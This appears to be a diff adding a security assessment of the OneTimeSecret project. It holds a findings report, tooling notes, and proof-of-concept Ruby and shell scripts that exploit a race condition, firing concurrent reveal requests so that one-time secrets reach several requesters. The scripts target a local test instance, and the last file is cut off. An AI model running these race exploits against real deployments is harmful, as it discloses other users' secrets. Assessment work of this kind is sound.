+The production Docker build runs `pnpm prune --prod` and deletes `node_modules` (Dockerfile:149-151); the runtime image ships no JS deps. These affect only the build/CI/dev host:
+- `ws` 8.19.0 — **High** DoS (GHSA-96hv-2xvq-fx4p) + moderate memory disclosure (GHSA-58qx-3vcg-4xpx); via vitest/jsdom/happy-dom. (pnpm-lock.yaml:4960)
+- `undici` 6.24.1 — **High** WebSocket DoS (GHSA-vxpw-j846-p89q) + 3 lower; via `@sentry/cli`. (pnpm-lock.yaml:4596)
+- `esbuild` 0.27.7 — Low dev-server file read on Windows (GHSA-g7r4-m6w7-qqqr). (pnpm-lock.yaml:2849)
+- `@babel/core <=7.29.0`, `js-yaml <=4.1.1` ReDoS, `markdown-it <=14.1.1` ReDoS — all dev-tree.
+- **Remediation:** Refresh dev toolchain (`pnpm update` for vitest/jsdom/happy-dom/@sentry/cli/esbuild). Low priority; no production exposure.
+
+### 1.4 Security-critical pinned versions (manually reviewed, no known-bad)
+`rack 3.2.6`, `puma 7.2.1`, `nokogiri 1.19.4`, `sanitize 7.0.0`, `json_schemer 2.5.0`, `json-jwt 1.17.0`, `jwt 3.2.0`, `rack-oauth2 2.3.0`, `openid_connect 2.3.1`, `webauthn 3.4.3`, `sequel 5.102.0`, `redis 5.4.1`, `stripe 18.4.2`, `sentry-ruby 6.5.0`, `omniauth 2.1.4` — none flagged by ruby-advisory-db (1158 advisories). Frontend: `vue 3.5.34`, `vite 8.0.16`, `dompurify 3.4.11` — clean. `oauth2` (1.1) is the only flagged Ruby gem.
+
+---
+
+## 2. Lockfile integrity & build provenance
+
+- **Both lockfiles present and self-consistent** with manifests (`Gemfile`/`Gemfile.lock`, `package.json`/`pnpm-lock.yaml` v9.0). Docker builds use `--frozen-lockfile` (Dockerfile:93) and `bundle install` against the committed lock.
+- **Git source — ACCEPTABLE:** `Gemfile:165,174` pulls `rspec` (+ subgems) from `git: https://github.com/rspec/rspec` pinned to revision `1559574…` (Gemfile.lock:3). This is the **canonical rspec org** repo at a 4.0.0.beta1 prerelease, and it is **test-group only** (excluded from the prod image via `BUNDLE_WITHOUT="development:test:optional"`, Dockerfile:84). Low risk, but pinning a beta from git for a test dep is a minor provenance smell — prefer a released gem when available.
+- **No path:/fork/non-canonical Ruby sources.** No git/tarball resolutions in `pnpm-lock.yaml`; default npmjs registry; `.npmrc` carries no auth tokens or alternate registry.
+- **pnpm `overrides` (pnpm-workspace.yaml:7-11):** `brace-expansion` pinned to `1.1.13` (patched past CVE-2024-4068 ReDoS — good), plus `yaml`, `@types/estree`, `flatted`. Benign hardening.
+- **NEEDS-VALIDATION:** `.npmrc` does **not** set `ignore-scripts`, and `pnpm-workspace.yaml:1-6 allowBuilds` permits postinstall builds for `@sentry/cli`, `esbuild`, `unrs-resolver`. Standard for these packages, but lifecycle scripts run at install — a supply-chain vector if any of those packages were compromised. Consider `ignore-scripts=true` + explicit allowlist if threat model warrants.
+
+---
+
+## 3. Container hardening
+
+**Main image (`Dockerfile`) — strong:**
+- Non-root `appuser` UID/GID 1001, `/sbin/nologin` (Dockerfile:237-238, 303, 348-349, 407).
+- Base images **digest-pinned**: `ruby:3.4-slim-trixie@sha256:3f33…` (Dockerfile:62), node/ruby in base.dockerfile:23-24, S6 overlay version-pinned (Dockerfile:193). Dockerfile syntax frontend digest-pinned (Dockerfile:1).
+- Multi-stage: build deps dropped; `bundle clean --force`, `pnpm prune --prod`, `rm -rf node_modules ~/.npm ~/.pnpm-store`, `npm uninstall -g pnpm` (Dockerfile:89,149-151). `apt` uses `--no-install-recommends` + `rm -rf /var/lib/apt/lists/*` (Dockerfile:205-213, 331-338).
+- No secrets baked into ENV/layers — `SECRET`/`SESSION_SECRET` are injected at runtime only (documented in header, Dockerfile:33-47). Only `EXPOSE 3000`.
+
+**Finding 4 — [MEDIUM] Caddy variant proxy is poorly hardened (`docker/variants/caddy.dockerfile`):**
+- **Runs as root** — no `USER` directive anywhere (`grep -c USER` = 0). This is the **internet-facing TLS-terminating proxy** in the full stack.
+- **Base image not digest-pinned:** `FROM debian:bookworm-slim` (line 85) — floating tag, undermines reproducibility/supply-chain integrity (contrast: builder stage `golang:1.26-bookworm@sha256:…` line 61 *is* pinned).
+- `apt-get install` lacks `--no-install-recommends` (lines 90-96), pulling extra packages (curl, bind9-dnsutils, iputils-ping, netcat — also broadens attack surface in a prod proxy).
+- Copies `./public/web` into the served root (line ~112), which includes the `.js.map` source maps (see Finding 3).
+- **Remediation:** add a non-root `USER`; digest-pin `debian:bookworm-slim`; add `--no-install-recommends`; drop debugging tools (netcat/ping/dig) from the production proxy image; exclude `.map` files from copied assets.
+
+**`.dockerignore` (`/home/user/onetimesecret/.dockerignore`) — good:** excludes `**/.env*`, `.git`, `.certs/`, `data/`, `*.rdb`, `Caddyfile`, `fly.toml`, and the rendered `etc/config.yaml`/`etc/auth.yaml`/`etc/billing.yaml` (lines 1-40) — prevents leaking host secrets/config into build context.
+
+---
+
+## 4. Secrets handling
+
+**Strong overall — no hardcoded production secrets found in any of the 5 repos.**
+
+- **Root `SECRET` fails closed:** `config.defaults.yaml:11 secret: <%= ENV['SECRET'] || nil %>` (no insecure fallback). `set_secrets.rb:39` returns `nil` if unset; `configure_familia.rb:25` **raises `'site.secret not set or empty'`** — the app will not boot without a real secret. CONFIRMED.
+- **Secret generation is sound:** `init.rake:116 SecureRandom.hex(64)` for root SECRET; derived keys via HKDF (`Onetime::KeyDerivation.derive_hex`, init.rake:126); independent secrets (`AUTH_SECRET`, `ARGON2_SECRET`) via `SecureRandom.hex` (init.rake:134). `.env` chmod 600 (install.sh:163,205).
+- **No committed secrets:** no `.env`/`.env.local`/`*.pem`/`*.key`/`id_rsa` tracked across all repos; `.env.example`/`.env.reference` ship **empty** secret values. The only private-key block is `familia/examples/encrypted_fields.rb` — an explicit example using `Base64('example-encryption-key-version-1')`, not a real key.
+- **Finding 9 — [LOW] Weak legacy KDF:** `configure_familia.rb:65 v1_key = Base64.strict_encode64(Digest::SHA256.digest(secret_key))` — a single unsalted SHA-256 round. This is **legacy read-compat only** (v2 is HKDF and is `current_key_version`, line 72), so new writes are safe, but legacy ciphertext remains protected by a weak derivation. Acceptable as a migration bridge; track for eventual removal once legacy data is re-encrypted.
+- AWS/SMTP/OAuth/Stripe credentials are all `ENV`-sourced with `nil` defaults (config.defaults.yaml, mailer.rb:305, ses.rb:63). `FROM_EMAIL` and emailer default to harmless `CHANGEME@example.com` placeholders.
+
+---
+
+## 5. Config drift / deployment
+
+**Finding 5 — [MEDIUM] Redis/Valkey unauthenticated + host-exposed:**
+- `docker/compose/docker-compose.simple.yml:35-71` runs valkey with `--bind 0.0.0.0`, **no `requirepass`/ACL**, and **publishes `6379:6379` to the host** (line 70). On a host without an external firewall, the secret store (encrypted secrets, sessions) is reachable on the LAN/host with no auth.
+- `etc/examples/valkey.conf:7` ships `#requirepass CHANGEME` **commented out** (default = no password); the example does `bind 127.0.0.1` (line 9) but the compose command overrides to `0.0.0.0`.
+- App-side `REDIS_URL` default `redis://127.0.0.1:6379/0` has no password (.env.example), and the YAML fallback is `redis://CHANGEME@127.0.0.1:6379` (config.defaults.yaml:557).
+- The **full** stack (docker-compose.full.yml) is better — valkey is `expose`-only (not published) on an internal bridge network — but still has no `requirepass`.
+- **Remediation:** set `requirepass`/ACL on valkey and a password in `REDIS_URL`; in simple compose bind to the docker network and do not publish 6379 to the host (or bind to `127.0.0.1:6379:6379`).
+
+**Finding 6 — [MEDIUM] RabbitMQ default `guest:guest`:**
+- `docker-compose.full.yml` sets `RABBITMQ_DEFAULT_USER=${RABBITMQ_USER:-guest}` / `RABBITMQ_DEFAULT_PASS=${RABBITMQ_PASS:-guest}` and worker/scheduler `RABBITMQ_URL=amqp://${RABBITMQ_USER:-guest}:${RABBITMQ_PASS:-guest}@rabbitmq:5672`. The YAML default is `amqp://guest:guest@localhost:5672/dev` (config.defaults.yaml:778). Ports are `expose`-only (not host-published), so blast radius is the internal network, but default creds are still poor hygiene.
+- **Remediation:** require `RABBITMQ_USER`/`RABBITMQ_PASS` (use `:?` like `SECRET`), document credential rotation.
+
+**fly.toml — good:** `force_https = true`, secrets via fly vault (`fly secrets set`), `RACK_ENV=production`, `CSP_ENABLED=true`. `tls_skip_verify=true` (line in `[[http_service.checks]]`) is only on the internal localhost health check — acceptable.
+
+**Diagnostics / Sentry — good:** `diagnostics.enabled` defaults **false** (config.defaults.yaml:982); all Sentry DSNs default `nil` (lines 1001-1028). DSN is only previewed (first 11 chars) in logs (setup_diagnostics.rb:66). Strict trace continuation supported. No DSN leakage.
+
+**Finding 3 — [MEDIUM] Source maps shipped to production:**
+- `vite.config.ts:283 sourcemap: true` with `outDir: '../public/web/dist'` (line 240). The Dockerfile copies all of `public/` into the final image (Dockerfile:245,356) with **no `.map` stripping** (none in Dockerfile or `.dockerignore`). `Onetime::Middleware::StaticFiles` serves `/dist` from `public/web` with no extension filter (static_files.rb:67,75), and `fly.toml [[statics]]` serves `/app/public/web/dist` at `/dist`. The Caddy variant also copies `public/web` to its served root.
+- The in-code comment "Sentry sourcemaps are uploaded via CI, not at build time" (vite.config.ts:219) refers to *upload* to Sentry — it does **not** prevent the `.map` files from being emitted to disk and served. Result: minified frontend source maps are publicly retrievable at `/dist/*.js.map`, disclosing original TypeScript/Vue source structure.
+- **Severity rationale:** MEDIUM — it's a client-side bundle (no server secrets in it), but it eases reconnaissance of client logic/endpoints. **NEEDS-VALIDATION** that a built image actually serves `200` for a `.map` URL (build not executed here).
+- **Remediation:** set `build.sourcemap: 'hidden'` (emits maps + references for Sentry upload but strips the `//# sourceMappingURL` comment) or delete `*.map` after Sentry upload in CI / before packaging; alternatively add `*.map` to `.dockerignore`-equivalent post-build cleanup and exclude from the Caddy `COPY`.
+
+**CORS / host allowlist:** `development.frontend_host` defaults to `http://localhost:5173` but the ViteProxy middleware is only mounted in `Onetime.development?` (application.rb:45-48), not production. No permissive CORS/`Access-Control-Allow-Origin: *` defaults found.
+
+---
+
+## 6. Logging of sensitive data
+
+- **Sentry URL scrubbing — well-designed:** `setup_diagnostics.rb:280-411` redacts secret/receipt/metadata/incoming identifiers, auth-token paths (`/forgot`, `/auth/reset-password`, `/account/email/confirm`), colonel admin paths, and query params (`key/secret/token/passphrase`), with fail-closed `[SCRUBBING_FAILED]` on error. `scripts/generate-sentry-scrub-patterns.ts` derives the frontend scrub patterns from route annotations (`sensitive=true`) and validates that each produces capture groups — good drift protection.
+- **Finding 8 — [LOW] `SessionDebugger` logs full response headers when enabled:** `apps/web/core/application.rb:50 use Rack::SessionDebugger if ENV['DEBUG_SESSION']`. When `DEBUG_SESSION` is truthy, `session_debugger.rb:98-103` logs `response_headers: headers` at debug — this includes `Set-Cookie` (the session cookie). The middleware does take care to discard the cookie *value* in `log_cookies` (line 247) and obscures `email` (line 145), but the wholesale `response_headers` dump at line 102 re-introduces the full `Set-Cookie`. **Gated/off by default** and only in development mounting, so LOW. **Remediation:** filter `set-cookie`/`authorization` out of the `response_headers` dump.
+- **`HeaderLoggerMiddleware`** (logs all headers incl. Cookie/Authorization) carries an explicit SECURITY WARNING and is **not mounted anywhere** — documentation-only (grep shows no `use` outside its own doc comment). No action needed beyond keeping it unwired.
+- No evidence of logging raw secret bodies, passphrases, or full request bodies in production code paths. `OT.ld` redacts the Redis password in `check_redis_url.rb:31` (`:***@`).
+
+---
+
+## 7. Install scripts
+
+- **No `curl|bash`, no insecure downloads.** `install.sh` `eval` usage (lines 29,36,50,57) is confined to internal version-extractor command strings (`ruby -e "puts RUBY_VERSION"`), not network input.
+- Secrets generated via `bundle exec rake ots:secrets` (`SecureRandom`/HKDF) and `.env` immediately `chmod 600` (install.sh:163,205). Refuses to proceed if `SECRET` is empty (install.sh:157,212).
+- `install-dev.sh:159-160` prompts for `sudo` only to symlink a Caddy parent dir — scoped and interactive. `install-test.sh` reviewed: no risky patterns.
+- The S6 Dockerfile and caddy builder download S6/xcaddy over **HTTPS from pinned GitHub release tags** (Dockerfile:225-226) — acceptable, though not checksum-verified (minor: consider verifying the S6 release SHA256).
+
+---
+
+## Recommended remediation priority
+
+1. **HIGH:** `bundle update oauth2` to `>= 2.0.22` (Finding 1) — only real production-reachable code vuln (SSO deployments).
+2. **HIGH:** Bump `axios`/override `form-data >= 4.0.6` (Finding 2) — clears prod-tree alert.
+3. **MEDIUM:** Set `sourcemap: 'hidden'` and stop shipping `.map` to prod / Caddy (Finding 3).
+4. **MEDIUM:** Harden the Caddy proxy image — non-root USER, digest-pin debian, `--no-install-recommends`, drop debug tools (Finding 4).
+5. **MEDIUM:** Add `requirepass`/ACL to valkey and stop publishing 6379 to the host in simple compose (Finding 5); require non-default RabbitMQ creds (Finding 6).
+6. **LOW:** Refresh dev JS toolchain (Finding 7); filter Set-Cookie from SessionDebugger response-header dump (Finding 8); plan removal of legacy v1 SHA-256 KDF (Finding 9).

--- a/docs/security/assessment-2026-06-22/notes/tooling.md
+++ b/docs/security/assessment-2026-06-22/notes/tooling.md
@@ -1,0 +1,52 @@
+# Tooling & Reproduction Notes
+
+## Environment
+- Host: Linux 6.18.5 x86_64, root with passwordless sudo.
+- Repos under `/home/user/{onetimesecret,otto,familia,rodauth,rodauth-omniauth}`, all on branch `claude/vigilant-goldberg-97ijfl`.
+- Outbound: transparent proxy present (`CLAUDE_CODE_PROXY_RESOLVES_HOSTS=true`); rubygems.org reachable (HTTP 200) so gem/Ruby install works. No production systems contacted.
+
+## Pre-installed
+- ruby 3.3.6 (rbenv; also 3.1.6, 3.2.6) — **too old**, app needs >= 3.4.7.
+- node v22.22.2, pnpm 11.8.0, redis-server 7.0.15 / redis-cli, psql, docker, python3, jq, curl, rg.
+- Missing: `sqlite3` CLI, `docker-compose` v1.
+
+## Installed / built during assessment (reversible)
+- `rbenv install 3.4.9` — built Ruby 3.4.9 to satisfy Gemfile `ruby '>= 3.4.7'`.
+
+## Redis for analysis
+- `redis-server --daemonize yes --save "" --appendonly no --port 6379` (no persistence; ephemeral; flushed after analysis).
+
+## Booting the app for dynamic analysis
+- `etc/config.yaml`, `etc/auth.yaml`, `etc/logging.yaml` were created locally by copying the
+  matching `etc/defaults/*.defaults.yaml`. These paths are **gitignored** (verified via
+  `git check-ignore`), so they are never committed. Remove them to reset.
+- Required env to boot: `SECRET` (any 64-hex), `REDIS_URL`, and `IDENTIFIER_SECRET`
+  (bridged to Familia's `VERIFIABLE_ID_HMAC_SECRET` so secret ids can be minted). Auth is OFF by
+  default, so no Postgres/SQLite is needed.
+- **Locale gotcha:** the container's default locale is US-ASCII; Rack's `config.ru` loader chokes on
+  the file's em-dash. Set `LC_ALL=C.UTF-8` (and/or force `Encoding.default_external = Encoding::UTF_8`
+  in-process). The background-task sandbox resets locale env, so the reliable path used here was the
+  in-process boot scripts (which force UTF-8 in Ruby).
+
+## Proof-of-concept artifacts (`../poc/`)
+- `race_reveal_model.rb` — in-process model-level race PoC (real `load`/`viewable?`/`decrypted_secret_value`/`revealed!`).
+  Deterministic mode: `ruby race_reveal_model.rb 10` → 10/10. Natural mode: `NOBARRIER=1 ruby … 50` → 1/1 (single-process GIL).
+- `_setup_secret.rb` + `_reveal_worker.rb` — multi-PROCESS true-parallel race (models clustered Puma):
+  setup writes id + a shared `deadline.txt`; launch N `_reveal_worker.rb` in parallel → **12/12 obtained plaintext**.
+- `race_reveal_inproc.rb` — full-stack HTTP race via `Rack::MockRequest` (otto→logic→model).
+- `headers_check.rb` — dumps live response security headers on default config (CSP/XFO/HSTS ABSENT).
+- `race_reveal.sh` / `boot_app.sh` — curl-based + puma boot variants (puma needs `LC_ALL=C.UTF-8`).
+- Evidence captured in `../evidence/race_poc_output.txt` and `../evidence/headers_output.txt`.
+
+Run pattern (Ruby 3.4.9):
+```
+cd /home/user/onetimesecret
+export PATH=/opt/rbenv/versions/3.4.9/bin:$PATH LC_ALL=C.UTF-8 LANG=C.UTF-8
+redis-cli -p 6379 flushall
+bundle exec ruby /home/user/security-assessment/poc/race_reveal_model.rb 10
+```
+
+## Reset / cleanup
+- All assessment artifacts live under `/home/user/security-assessment/` only.
+- No tracked source files modified/committed. Local analysis-only edits (if any) are reverted before finishing.
+- Kill analysis redis: `redis-cli -p 6379 shutdown nosave`.

--- a/docs/security/assessment-2026-06-22/notes/tooling.md
+++ b/docs/security/assessment-2026-06-22/notes/tooling.md
@@ -36,7 +36,7 @@
 - `race_reveal_inproc.rb` — full-stack HTTP race via `Rack::MockRequest` (otto→logic→model).
 - `headers_check.rb` — dumps live response security headers on default config (CSP/XFO/HSTS ABSENT).
 - `race_reveal.sh` / `boot_app.sh` — curl-based + puma boot variants (puma needs `LC_ALL=C.UTF-8`).
-- Evidence captured in `../evidence/race_poc_output.txt` and `../evidence/headers_output.txt`.
+- Evidence captured in `../evidence/race_poc_output.md` and `../evidence/headers_output.md`.
 
 Run pattern (Ruby 3.4.9):
 ```

--- a/docs/security/assessment-2026-06-22/poc/_reveal_worker.rb
+++ b/docs/security/assessment-2026-06-22/poc/_reveal_worker.rb
@@ -1,0 +1,34 @@
+# One-shot reveal worker (separate OS process => true parallelism, no shared GIL).
+# Boots, waits for a shared wall-clock deadline, then runs the real reveal
+# sequence once and reports whether it obtained the plaintext.
+Encoding.default_external = Encoding::UTF_8
+Encoding.default_internal = Encoding::UTF_8
+ENV['RACK_ENV']                 ||= 'development'
+ENV['ONETIME_HOME']               = '/home/user/onetimesecret'
+ENV['SECRET']                   ||= File.read('/home/user/security-assessment/notes/.test_secret').strip
+ENV['REDIS_URL']                ||= 'redis://127.0.0.1:6379/0'
+ENV['IDENTIFIER_SECRET']        ||= 'a' * 64
+ENV['VERIFIABLE_ID_HMAC_SECRET']||= ENV['IDENTIFIER_SECRET']
+ENV['HOST']                     ||= 'localhost:3000'
+$LOAD_PATH.unshift('/home/user/onetimesecret/lib')
+require 'onetime'
+OT.execution_mode = :backend
+Onetime.boot! :app
+begin; require 'semantic_logger'; SemanticLogger.default_level = :fatal; rescue StandardError; end
+
+id       = File.read('/home/user/security-assessment/evidence/secret_id.txt').strip
+deadline = File.read('/home/user/security-assessment/evidence/deadline.txt').strip.to_f
+
+# Pre-load the secret instance, then spin-wait to the shared deadline so all
+# processes hit the consume within the same millisecond.
+s = Onetime::Secret.load(id)
+viewable = s && s.viewable?
+sleep 0.001 while Process.clock_gettime(Process::CLOCK_REALTIME) < deadline
+
+got = false
+if viewable
+  val = s.decrypted_secret_value
+  s.revealed!
+  got = !val.to_s.empty?
+end
+puts "WORKER pid=#{Process.pid} viewable=#{!!viewable} got=#{got}"

--- a/docs/security/assessment-2026-06-22/poc/_setup_secret.rb
+++ b/docs/security/assessment-2026-06-22/poc/_setup_secret.rb
@@ -1,0 +1,23 @@
+# Creates one secret and writes its id for the multi-process race workers.
+Encoding.default_external = Encoding::UTF_8
+Encoding.default_internal = Encoding::UTF_8
+ENV['RACK_ENV']                 ||= 'development'
+ENV['ONETIME_HOME']               = '/home/user/onetimesecret'
+ENV['SECRET']                   ||= File.read('/home/user/security-assessment/notes/.test_secret').strip
+ENV['REDIS_URL']                ||= 'redis://127.0.0.1:6379/0'
+ENV['IDENTIFIER_SECRET']        ||= 'a' * 64
+ENV['VERIFIABLE_ID_HMAC_SECRET']||= ENV['IDENTIFIER_SECRET']
+ENV['HOST']                     ||= 'localhost:3000'
+$LOAD_PATH.unshift('/home/user/onetimesecret/lib')
+require 'onetime'
+OT.execution_mode = :backend
+Onetime.boot! :app
+begin; require 'semantic_logger'; SemanticLogger.default_level = :fatal; rescue StandardError; end
+
+s = Onetime::Secret.new
+s.objid
+s.state = 'new'; s.owner_id = 'anon'; s.lifespan = 3600
+s.ciphertext = "RACE-CANARY-#{Time.now.to_i}-#{rand(1_000_000)}"
+s.save
+File.write('/home/user/security-assessment/evidence/secret_id.txt', s.identifier)
+puts "created #{s.identifier}"

--- a/docs/security/assessment-2026-06-22/poc/boot_app.sh
+++ b/docs/security/assessment-2026-06-22/poc/boot_app.sh
@@ -1,0 +1,17 @@
+#!/usr/bin/env bash
+# Boots OneTimeSecret locally for dynamic analysis (synthetic data only).
+set -uo pipefail
+cd /home/user/onetimesecret
+export PATH="/opt/rbenv/versions/3.4.9/bin:$PATH"
+export LANG=C.UTF-8
+export LC_ALL=C.UTF-8
+export RUBYOPT="-E UTF-8"
+export SECRET="$(cat /home/user/security-assessment/notes/.test_secret)"
+export REDIS_URL="redis://127.0.0.1:6379/0"
+# Bridge needed so Familia::VerifiableIdentifier can mint secret ids:
+export IDENTIFIER_SECRET="$(ruby -rsecurerandom -e 'print SecureRandom.hex(32)')"
+export VERIFIABLE_ID_HMAC_SECRET="$IDENTIFIER_SECRET"
+export RACK_ENV="${RACK_ENV:-development}"
+export HOST="localhost:3000"
+export SSL=false
+exec bundle exec puma -p 3000 -e "$RACK_ENV"

--- a/docs/security/assessment-2026-06-22/poc/headers_check.rb
+++ b/docs/security/assessment-2026-06-22/poc/headers_check.rb
@@ -1,0 +1,35 @@
+# Dumps actual response headers from the running stack to confirm which
+# security headers are present on a DEFAULT install (no MIDDLEWARE_* / CSP_ENABLED set).
+Encoding.default_external = Encoding::UTF_8
+Encoding.default_internal = Encoding::UTF_8
+ENV['RACK_ENV']                 ||= 'development'
+ENV['ONETIME_HOME']               = '/home/user/onetimesecret'
+ENV['SECRET']                   ||= File.read('/home/user/security-assessment/notes/.test_secret').strip
+ENV['REDIS_URL']                ||= 'redis://127.0.0.1:6379/0'
+ENV['IDENTIFIER_SECRET']        ||= 'a' * 64
+ENV['VERIFIABLE_ID_HMAC_SECRET']||= ENV['IDENTIFIER_SECRET']
+ENV['HOST']                     ||= 'localhost:3000'
+$LOAD_PATH.unshift('/home/user/onetimesecret/lib')
+require 'onetime'
+OT.execution_mode = :backend
+Onetime.boot! :app
+Onetime::Application::Registry.prepare_application_registry
+APP = Onetime::Application::Registry.generate_rack_url_map
+begin; require 'semantic_logger'; SemanticLogger.default_level = :fatal; rescue StandardError; end
+require 'rack/mock'
+
+SECURITY_HEADERS = [
+  'content-security-policy', 'x-frame-options', 'strict-transport-security',
+  'x-content-type-options', 'x-xss-protection', 'referrer-policy',
+  'cross-origin-opener-policy', 'access-control-allow-origin', 'set-cookie',
+]
+
+['/api/v2/status', '/'].each do |path|
+  env = Rack::MockRequest.env_for(path, method: 'GET', 'REMOTE_ADDR' => '127.0.0.1', 'HTTP_HOST' => 'localhost:3000')
+  status, headers, _ = APP.call(env)
+  h = {}; headers.each { |k, v| h[k.downcase] = v }
+  puts "\n=== GET #{path}  -> HTTP #{status} ==="
+  SECURITY_HEADERS.each do |hd|
+    puts format("  %-30s %s", hd + ':', h.key?(hd) ? h[hd].to_s[0, 80] : '<ABSENT>')
+  end
+end

--- a/docs/security/assessment-2026-06-22/poc/race_reveal.sh
+++ b/docs/security/assessment-2026-06-22/poc/race_reveal.sh
@@ -1,0 +1,50 @@
+#!/usr/bin/env bash
+# PoC: TOCTOU race in the one-time guarantee.
+# Conceals a secret, then fires N concurrent reveals and counts how many
+# distinct requests receive the plaintext. A correct one-time secret store
+# returns the plaintext to AT MOST ONE requester; >1 proves the race.
+#
+# Usage: race_reveal.sh [BASE_URL] [CONCURRENCY]
+set -uo pipefail
+BASE="${1:-http://127.0.0.1:3000}"
+N="${2:-30}"
+PLAINTEXT="RACE-CANARY-$(date +%s)-$RANDOM"
+OUT=$(mktemp -d)
+
+echo "[*] Base: $BASE   concurrency: $N   canary: $PLAINTEXT"
+
+# 1. Conceal a secret (anonymous/guest)
+CONCEAL=$(curl -s -X POST "$BASE/api/v2/secret/conceal" \
+  -H 'Content-Type: application/x-www-form-urlencoded' \
+  --data-urlencode "secret[secret]=$PLAINTEXT" \
+  --data-urlencode "secret[ttl]=3600")
+echo "[*] Conceal response:"; echo "$CONCEAL" | jq . 2>/dev/null || echo "$CONCEAL"
+
+# Extract the shareable secret identifier (try common shapes)
+SID=$(echo "$CONCEAL" | jq -r '
+  .record.secret.identifier // .record.secret.secret_identifier //
+  .record.secret.key // .record.secret.objid // empty' 2>/dev/null)
+if [ -z "$SID" ]; then
+  echo "[!] Could not auto-extract secret identifier; inspect response above."; exit 2
+fi
+echo "[*] Secret identifier: $SID"
+
+# 2. Fire N concurrent reveals
+echo "[*] Firing $N concurrent reveals..."
+for i in $(seq 1 "$N"); do
+  ( curl -s -X POST "$BASE/api/v2/secret/$SID/reveal" \
+      -H 'Content-Type: application/x-www-form-urlencoded' \
+      --data-urlencode "continue=true" > "$OUT/resp_$i.json" ) &
+done
+wait
+
+# 3. Count how many responses contained the plaintext canary
+HITS=$(grep -l "$PLAINTEXT" "$OUT"/resp_*.json 2>/dev/null | wc -l | tr -d ' ')
+echo "============================================================"
+echo "[RESULT] Requests that received the plaintext: $HITS / $N"
+if [ "$HITS" -gt 1 ]; then
+  echo "[VULNERABLE] One-time guarantee BROKEN — secret revealed to $HITS requesters."
+else
+  echo "[OK] Plaintext returned to at most one requester in this run."
+fi
+echo "Sample responses saved under: $OUT"

--- a/docs/security/assessment-2026-06-22/poc/race_reveal_inproc.rb
+++ b/docs/security/assessment-2026-06-22/poc/race_reveal_inproc.rb
@@ -1,0 +1,90 @@
+# PoC: TOCTOU race in the one-time guarantee (in-process, full stack).
+# Boots OneTimeSecret in-process and drives the REAL otto->logic->model->Redis
+# reveal path concurrently via Rack::MockRequest. A correct one-time store
+# returns the plaintext to AT MOST ONE requester. >1 proves the race.
+#
+# Run: ruby race_reveal_inproc.rb [CONCURRENCY] [TRIALS]
+
+# Force UTF-8 regardless of container locale (config.ru contains an em-dash).
+Encoding.default_external = Encoding::UTF_8
+Encoding.default_internal = Encoding::UTF_8
+
+ENV['RACK_ENV']                 ||= 'development'
+ENV['ONETIME_HOME']               = '/home/user/onetimesecret'
+ENV['SECRET']                   ||= File.read('/home/user/security-assessment/notes/.test_secret').strip
+ENV['REDIS_URL']                ||= 'redis://127.0.0.1:6379/0'
+ENV['IDENTIFIER_SECRET']        ||= 'a' * 64
+ENV['VERIFIABLE_ID_HMAC_SECRET']||= ENV['IDENTIFIER_SECRET']
+ENV['HOST']                     ||= 'localhost:3000'
+ENV['SSL']                      ||= 'false'
+
+$LOAD_PATH.unshift('/home/user/onetimesecret/lib')
+require 'onetime'
+OT.execution_mode = :backend
+Onetime.boot! :app
+Onetime::Application::Registry.prepare_application_registry
+APP = Onetime::Application::Registry.generate_rack_url_map
+
+require 'rack/mock'
+require 'json'
+require 'uri'
+
+CONC   = (ARGV[0] || 25).to_i
+TRIALS = (ARGV[1] || 5).to_i
+
+def http(method, path, params = {})
+  body = URI.encode_www_form(params)
+  env  = Rack::MockRequest.env_for(
+    path,
+    method: method,
+    input: body,
+    'CONTENT_TYPE' => 'application/x-www-form-urlencoded',
+    'REMOTE_ADDR'  => '127.0.0.1',
+  )
+  status, _h, b = APP.call(env)
+  s = +''
+  b.each { |c| s << c }
+  b.close if b.respond_to?(:close)
+  [status, s]
+end
+
+def conceal(plaintext)
+  st, resp = http('POST', '/api/v2/secret/conceal',
+                  'secret[secret]' => plaintext, 'secret[ttl]' => '3600')
+  data = JSON.parse(resp) rescue {}
+  sec  = data.dig('record', 'secret') || {}
+  sid  = sec['identifier'] || sec['secret_identifier'] || sec['key'] || sec['objid']
+  [st, sid, resp]
+end
+
+# Sanity: show the conceal response shape once.
+st, sid, resp = conceal("SHAPE-CHECK")
+puts "[conceal] status=#{st} id=#{sid.inspect}"
+puts "[conceal] body (first 600B): #{resp[0, 600]}"
+abort "Could not conceal/extract id; aborting." unless sid
+
+overall_vuln = false
+TRIALS.times do |t|
+  canary = "RACE-CANARY-#{Time.now.to_i}-#{t}-#{rand(1_000_000)}"
+  _st, sid, _ = conceal(canary)
+  gate = Queue.new                       # barrier: release all threads at once
+  hits = Queue.new
+  threads = CONC.times.map do
+    Thread.new do
+      gate.pop                           # wait for the starting gun
+      st, body = http('POST', "/api/v2/secret/#{sid}/reveal", 'continue' => 'true')
+      hits << 1 if st == 200 && body.include?(canary)
+    end
+  end
+  sleep 0.05
+  CONC.times { gate << :go }             # fire simultaneously
+  threads.each(&:join)
+  n = hits.size
+  overall_vuln ||= n > 1
+  puts "[trial #{t + 1}/#{TRIALS}] id=#{sid[0,12]}…  reveals_returning_plaintext=#{n}/#{CONC}  #{n > 1 ? 'VULNERABLE' : 'ok'}"
+end
+
+puts "============================================================"
+puts overall_vuln ?
+  "[RESULT] VULNERABLE — one-time guarantee broken: a single secret was revealed to >1 concurrent requester." :
+  "[RESULT] No double-reveal observed in this run (try higher concurrency)."

--- a/docs/security/assessment-2026-06-22/poc/race_reveal_model.rb
+++ b/docs/security/assessment-2026-06-22/poc/race_reveal_model.rb
@@ -1,0 +1,80 @@
+# PoC: TOCTOU race in the one-time guarantee (model level, deterministic).
+#
+# Each thread runs the EXACT sequence a reveal request runs against its own
+# freshly-loaded Secret instance:
+#     s = Onetime::Secret.load(id)        # process_params
+#     s.viewable?                         # raise_concerns gate (HEXISTS)
+#     <barrier>                           # model the reachable concurrent interleave
+#     v = s.decrypted_secret_value        # process: decrypt
+#     s.revealed!                         # process: consume (destroy!)
+#
+# The barrier reproduces the state that arises in production whenever two
+# requests both pass the viewable? gate before either calls destroy! — which
+# happens readily across multiple Puma worker PROCESSES (no shared GIL).
+# It does NOT alter any application code; it only schedules the threads.
+#
+# A correct one-time store hands the plaintext to AT MOST ONE caller.
+
+Encoding.default_external = Encoding::UTF_8
+Encoding.default_internal = Encoding::UTF_8
+ENV['RACK_ENV']                 ||= 'development'
+ENV['ONETIME_HOME']               = '/home/user/onetimesecret'
+ENV['SECRET']                   ||= File.read('/home/user/security-assessment/notes/.test_secret').strip
+ENV['REDIS_URL']                ||= 'redis://127.0.0.1:6379/0'
